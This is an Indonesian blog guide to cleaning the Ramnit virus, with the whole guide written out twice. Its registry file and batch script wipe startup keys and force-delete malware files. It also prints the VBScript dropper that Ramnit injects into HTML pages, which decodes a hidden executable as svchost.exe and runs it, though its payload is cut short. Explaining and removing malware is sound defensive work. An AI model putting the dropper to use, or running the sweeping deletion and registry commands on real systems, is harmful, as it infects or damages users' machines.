Sebelum memulai, hendaknya persiapkan dulu senjata2 yang dibutuhkan
>> ramnit_removal.reg
>> ramnit_removal.bat
>> CCleaner
>> CHANET SPLITTERII.exe
download software ini. http://www.vaksin.com/2011/0811/immune from ramnit/CHANET SPLITTERII.exe
>> Antivirus (saya menggunakan Avast)
===============================================================
Windows Registry Editor Version 5.00
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
“Userinitâ€=â€c:\\windows\\system32\\userinit.exeâ€
[HKEY_CLASSES_ROOT\regfile\shell\open\command]
@=â€regedit.exe \â€%1\â€"
[HKEY_CLASSES_ROOT\inffile\shell\open\command]
@=hex(2):22,00,25,00,31,00,22,00,20,00,25,00,2a,00,00,00
[HKEY_CLASSES_ROOT\exefile]
@=â€Applicationâ€
“EditFlagsâ€=hex:38,07,00,00
“TileInfoâ€=â€prop:FileDescription;Company;FileVersionâ€
“InfoTipâ€=â€prop:FileDescription;Company;FileVersion;Create;Sizeâ€
[HKEY_CLASSES_ROOT\exefile\DefaultIcon]
@=â€%1?
[HKEY_CLASSES_ROOT\exefile\shell]
[HKEY_CLASSES_ROOT\exefile\shell\open]
“EditFlagsâ€=hex:00,00,00,00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@=â€\â€%1\†%*â€
[HKEY_CLASSES_ROOT\exefile\shell\runas]
[HKEY_CLASSES_ROOT\exefile\shell\runas\command]
@=â€\â€%1\†%*â€
### simpan dengan nama ramnit_removal.reg
===============================================================
===============================================================
@echo off
REM “Ini untuk Remove/delete Induk Virusâ€
del /f /s /q /a “%ProgramFiles%\Microsoft\WaterMark.exeâ€>Delete_Log.txt
del /f /s /q /a “%ProgramFiles%\Microsoft\DesktopLayer.exeâ€>>Delete_Log.txt
del /f /s /q /a “%systemroot%\System32\dmlconf.datâ€>>Delete_Log.txt
REM “This is for erase another tricky worm files, if it existâ€
del /f /s /q /a “%Systemroot%\dmlconf.datâ€>>Delete_Log.txt
del /f /s /q /a “%Systemroot%\lssas.exeâ€>>Delete_Log.txt
del /f /s /q /a “%systemroot%\ExplorerSrv.exeâ€>>Delete_Log.txt
del /f /s /q /a “%systemroot%\System32\rundll32Srv.exeâ€>>Delete_Log.txt
del /f /s /q /a “%ProgramFiles%\synaptics\syntp\SynTPEnhSrv.exeâ€>>Delete_Log.txt
del /f /s /q /a “%UserProfile%\Local-Settings\Application Data\\.exeâ€>>Delete_Log.txt
REM “Ini untuk mencegah kembalinya virusâ€
mkdir “%ProgramFiles%\Microsoft\WaterMark.exeâ€
attrib +r +s -h -a “%ProgramFiles%\Microsoft\WaterMark.exe†/s /d
mkdir “%ProgramFiles%\Microsoft\DesktopLayer.exeâ€
attrib +r +s -h -a “%ProgramFiles%\Microsoft\DesktopLayer.exe†/s /d
mkdir “%systemroot%\System32\dmlconf.datâ€
attrib +r +s -h -a “%systemroot%\System32\dmlconf.dat†/s /d
REM “Ini untuk mengembalikan registry settingsâ€
reg import Ramnit_removal.reg
exit
### simpan dengan nama ramnit_removal.bat ###
===============================================================
***************************************************************
***************************************************************
kedua file tersebut, letakkan di 1 folder
ramnit_removal.bat
ramnit_removal.reg
setelah itu install / double click
setelah itu, perbaiki registry dengan menggunakan CCleaner
kemudian bersihkan recycle bin
sampai disini merokok dulu biar lega :D
restart PC Anda, kemudian tekan F8
masuk ke SAFE MODE
kemudian jalankan CHANET SPLITTERII.exe. scan saja semua drive
Chanet Splitterii berfungsi untuk menghapus script bajingan ini
" <SCRIPT language=â€VBScriptâ€><! –
DropFileName = “svchost.exeâ€
WriteData = “4D5A90000300000004000000FFFF0000B8000000 // very long here…
Set FSO = CreateObject(“Scripting.FileSystemObjectâ€)
DropPath = FSO.GetSpecialFolder(2) & “\†& DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(“&H†& Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject(“WScript.Shellâ€)
WSHshell.Run DropPath, 0
//–> "
ini biasanya terdapat disetiap file htm / html
saya menggunakan software karya anak bangsa ini untuk memudahkan.
karena ada +/- 16.000 file html yg terjangkit. kalau dihapus secara manual cape deeeh =))
kalau sudah selesai, untuk memastikan ramnit nya sudah hilang atau belum, gunakan antivirus terupdate
saya sih menggunakan Avast terbaru. kemudian saya scan melalui BOOT SCAN
Alhasil virus ramnit bersih total di PC saya
*****************************************
nyantai saja, file htm / html Anda yg terjangkit virus ramnit ini TIDAK HILANG kok
yang hilang tuh virusnya. File aman2 saja.
Sebelum Memulai hendaknya persiapkan senjata dulu : Senjata Clean Ramnit
>> ramnit_removal.reg
>> ramnit_removal.bat
>> CCleaner
>> CHANET SPLITTERII.exe
download software ini. http://www.vaksin.com/2011/0811/immune from ramnit/CHANET SPLITTERII.exe
>> Antivirus (saya menggunakan Avast)
===============================================================
Windows Registry Editor Version 5.00
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
“Userinitâ€=â€c:\\windows\\system32\\userinit.exeâ€
[HKEY_CLASSES_ROOT\regfile\shell\open\command]
@=â€regedit.exe \â€%1\â€"
[HKEY_CLASSES_ROOT\inffile\shell\open\command]
@=hex(2):22,00,25,00,31,00,22,00,20,00,25,00,2a,00,00,00
[HKEY_CLASSES_ROOT\exefile]
@=â€Applicationâ€
“EditFlagsâ€=hex:38,07,00,00
“TileInfoâ€=â€prop:FileDescription;Company;FileVersionâ€
“InfoTipâ€=â€prop:FileDescription;Company;FileVersion;Create;Sizeâ€
[HKEY_CLASSES_ROOT\exefile\DefaultIcon]
@=â€%1?
[HKEY_CLASSES_ROOT\exefile\shell]
[HKEY_CLASSES_ROOT\exefile\shell\open]
“EditFlagsâ€=hex:00,00,00,00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@=â€\â€%1\†%*â€
[HKEY_CLASSES_ROOT\exefile\shell\runas]
[HKEY_CLASSES_ROOT\exefile\shell\runas\command]
@=â€\â€%1\†%*â€
### simpan dengan nama ramnit_removal.reg
===============================================================
===============================================================
@echo off
REM “Ini untuk Remove/delete Induk Virusâ€
del /f /s /q /a “%ProgramFiles%\Microsoft\WaterMark.exeâ€>Delete_Log.txt
del /f /s /q /a “%ProgramFiles%\Microsoft\DesktopLayer.exeâ€>>Delete_Log.txt
del /f /s /q /a “%systemroot%\System32\dmlconf.datâ€>>Delete_Log.txt
REM “This is for erase another tricky worm files, if it existâ€
del /f /s /q /a “%Systemroot%\dmlconf.datâ€>>Delete_Log.txt
del /f /s /q /a “%Systemroot%\lssas.exeâ€>>Delete_Log.txt
del /f /s /q /a “%systemroot%\ExplorerSrv.exeâ€>>Delete_Log.txt
del /f /s /q /a “%systemroot%\System32\rundll32Srv.exeâ€>>Delete_Log.txt
del /f /s /q /a “%ProgramFiles%\synaptics\syntp\SynTPEnhSrv.exeâ€>>Delete_Log.txt
del /f /s /q /a “%UserProfile%\Local-Settings\Application Data\\.exeâ€>>Delete_Log.txt
REM “Ini untuk mencegah kembalinya virusâ€
mkdir “%ProgramFiles%\Microsoft\WaterMark.exeâ€
attrib +r +s -h -a “%ProgramFiles%\Microsoft\WaterMark.exe†/s /d
mkdir “%ProgramFiles%\Microsoft\DesktopLayer.exeâ€
attrib +r +s -h -a “%ProgramFiles%\Microsoft\DesktopLayer.exe†/s /d
mkdir “%systemroot%\System32\dmlconf.datâ€
attrib +r +s -h -a “%systemroot%\System32\dmlconf.dat†/s /d
REM “Ini untuk mengembalikan registry settingsâ€
reg import Ramnit_removal.reg
exit
### simpan dengan nama ramnit_removal.bat ###
===============================================================
***************************************************************
***************************************************************
kedua file tersebut, letakkan di 1 folder
ramnit_removal.bat
ramnit_removal.reg
setelah itu install / double click
setelah itu, perbaiki registry dengan menggunakan CCleaner
kemudian bersihkan recycle bin
sampai disini merokok dulu biar lega :D
restart PC Anda, kemudian tekan F8
masuk ke SAFE MODE
kemudian jalankan CHANET SPLITTERII.exe. scan saja semua drive
Chanet Splitterii berfungsi untuk menghapus script bajingan ini
" <SCRIPT language=â€VBScriptâ€><! –
DropFileName = “svchost.exeâ€
WriteData = “4D5A90000300000004000000FFFF0000B8000000 // very long here…
Set FSO = CreateObject(“Scripting.FileSystemObjectâ€)
DropPath = FSO.GetSpecialFolder(2) & “\†& DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(“&H†& Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject(“WScript.Shellâ€)
WSHshell.Run DropPath, 0
//–> "
ini biasanya terdapat disetiap file htm / html
saya menggunakan software karya anak bangsa ini untuk memudahkan.
karena ada +/- 16.000 file html yg terjangkit. kalau dihapus secara manual cape deeeh =))
kalau sudah selesai, untuk memastikan ramnit nya sudah hilang atau belum, gunakan antivirus terupdate
saya sih menggunakan Avast terbaru. kemudian saya scan melalui BOOT SCAN
Alhasil virus ramnit bersih total di PC saya
*****************************************
nyantai saja, file htm / html Anda yg terjangkit virus ramnit ini TIDAK HILANG kok
yang hilang tuh virusnya. File aman2 saja.
Sebelum Memulai hendaknya persiapkan senjata dulu : Senjata Clean Ramnit


0 komentar:
Posting Komentar
Terima Kasih telah berkomentar. :D